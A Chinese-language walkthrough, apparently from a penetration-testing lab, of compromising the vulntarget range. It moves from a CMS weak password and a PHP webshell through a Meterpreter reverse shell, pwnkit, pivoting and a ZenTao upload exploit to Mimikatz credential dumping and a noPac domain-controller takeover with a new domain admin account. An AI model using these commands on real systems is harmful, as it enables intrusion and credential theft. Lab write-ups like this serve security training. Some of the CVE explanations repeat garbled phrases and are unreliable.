简介
原靶机项目地址:https://github.com/crow821/vulntarget
此靶场在灵境平台启动。
外网渗透
Web网页漏洞
打开平台给的 IP,用 nmap 扫描一下,开放了
访问 80 端口,识别到安装了宝塔面板。
81 端口是极致 CMS。
用 dirsearch 扫描他的路径,找到了后台登录页面。
然后尝试弱口令admin/admin123就进去了。
之后点击插件管理,下载一个叫在线编辑模板的插件,然后安装。
点击配置后,就可以进入一个叫在线文件管理工具的页面。我们在 index.php 文件里面加上一句话木马。
利用蚁剑进行连接。
连接上以后,以后虚拟终端执行命令时,返回 ret=127,这应该是宝塔面板设置了 disable_functions,没事,我们可以用插件进行绕过。
如果没下插件的话,需要在插件市场下载disable_functions 绕过插件,需要开梯子,因为这些插件都是托管在 GitHub 的。然后配置蚁剑的代理到梯子的端口就行了。
下载好后进行绕过,成功绕过就可以执行命令了。
Web服务器上线MSF
首先生成木马。
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.159.129 lport=3399 -f elf > shell.elf然后开启监听。
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.159.129
set lport 3399
run
把我们刚生成的shell.elf木马文件上传到 Web 服务器上。
接下来在 Web 服务器上执行这个木马,我们的 MSF 控制台就会上线这个 Web 服务器。
提权
我们现在的权限还是 www 用户,我们接下来提权到 root 用户。
我们先退出回话,然后直接利用 MSF 自带的辅助提权程序进行提权。
background
use multi/recon/local_exploit_suggester
set session 1
run发现扫描到了很多漏洞。
我们用第一个进行攻击。
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1执行完后成功获得 root 权限。
内网渗透
前面我们已经获得了 Web 服务器的 root 权限。
接下来就要利用这台 Web 服务器的权限进行内网渗透。
内网探测
发现 Web 服务器的内网地址是10.0.20.33。
代理配置
接下来我们配置 10.0.20.0/24 的路由。
run autoroute -s 10.0.20.0/24
run autoroute -p
配置完成后,我们开启大力,用 MSF 自带的 socks 模块。
use auxiliary/server/socks_proxy使用默认配置就行,端口保持默认的 1080 端口。
然后利用 scanner/portscan/tcp 模块简单扫描下常用端口,发现了 8080 端口。
接下来,Kali 攻击机开启代理就可以访问10.0.20.66:8080了。
sudo vim /etc/proxychains4.conf在 [ProxyList] 下面,可能会有一些被注释掉的示例(比如 socks4 127.0.0.1 9050)把我们代理的地址添加到最后:
接下来在浏览器里面配置代理就可以访问了。
OK,成功访问。
禅道CMS渗透
首先尝试一波弱口令,没想到admin/Admin123直接就登录了。
页面右下角有当前禅道的版本 -12.4.2,我们直接去网上搜相关的漏洞,发现存在文件上传漏洞(CNVD-C-2020-121325)。
漏洞的大概意思就是:
用户访问 http://[目标地址]/index.php?m=client&f=download&version=[$version 参数]&[base64 加密后的恶意文件地址]
访问后会将文件保存在服务器的 data/client/1/ 目录下。
首先写一个 php 木马。
<?php @eval($_POST['shell']);phpinfo();?>然后上传到 Web 服务器并开启 http 服务。
python -m SimpleHTTPServer 8847base 编码转换是 HTTP 需要大写,version 随意就行。
HTTP://10.0.20.33:8847/shell.php
SFRUUDovLzEwLjAuMjAuMzM6ODg0Ny9zaGVsbC5waHA漏洞地址:http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzM6ODg0Ny9zaGVsbC5waHA。
访问漏洞地址后,显示文件保存成功。
访问我们生成的 shell.php 文件。
接下来,要进行远控,蚁剑要先进行代理配置,代理服务器填的是 Kali 的 IP 地址。
连接成功。
利用蚁剑插件识别到了火绒杀软。
免杀过火绒
接下来我们要让这台主机也上线 MSF,但是这里得进行火绒免杀,首先生成一个正常的木马文件。
接下来进行免杀操作。做完免杀后上传成功。
接着让这台主机上线 MSF。
需要使用提权后的 session 会话添加路由,要不然不能反弹 shell 进入 session2 执行如下命令:
run autoroute -s 10.0.20.66/24
run autoroute -s 10.0.20.33/24
获取到低权限,然后进行提权,和上一个主机一样,使用 MSF 自带的提权程序。
使用 post/multi/recon/local_exploit_suggester 模块进行攻击。
但是尝试后发现都无法提权成功。我们直接上传提权工具cve-2021-1732.exe。
成功获取管理员权限。
漏洞简介
CVE-2021-1732 是蔓灵花(BITTER)APT 组织在某次被披露的攻击行动中使用的 0day 漏洞,该高危漏洞可以在本地将普通用户进程的权限提升至最高的 SYSTEM 权限
受影响的版本:
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows Server, version 1909 (Server Core installation)
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1803 for x64-based Systems
使用 Mimikatz 读取密码。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
漏洞简介
CVE-2021-42278,机器用户应当是 computer 的形式,但是实际并没有验证机器账号是否有的形式,但是实际并没有验证机器账号是否有的形式,但是实际并没有验证机器账号是否有。导致机器用户名可以被模拟冒用。
CVE-2021-42287,使用 computer 的 TGT 通过另一个用户去请求 computer 自己的 ST 时,将 TGT 发送给 KDC 后,当 KDC 找不到 computer。KDC 会再次寻找 computer 的 ST,从而获得了 computer 的 ST,从而获得了 computer 的 ST,从而获得了 computer 的 ST。从而获得了 computer$ 的权限。
影响范围:
CVE-2021-42287:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
CVE-2021-42278:
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2019
Windows Server 2012 R2 (Server Core installation)
域控Win2016
CVE-2021-42287/CVE-2021-42278
得到 win101 的密码之后,使用最近的爆出的域内提权拿下域控,先上传 nopac.exe
定位域控主机。
获取到域控 IP 和 hostname。
列出域控目录
dir \\WIN-UH20PRD3EAO.vulntarget.com\c$
获取票据
noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test2 /mPassword admin@123 /service cifs /ptt上传 psexec,远程添加一个域控管理员账号。
net user admin QWEasd@123 /add /domain
net group "Domain Admins" admin /add /domain开启win10远程,登录试试,修改防火墙策略
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
开启远程
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f可以连接上。至此,拿下域控服务器。
总结
个人感觉靶场有一定难度,涉及的漏洞还是挺多的!
靶场涉及漏洞:极致 cms 相关漏洞、禅道 cms 相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278。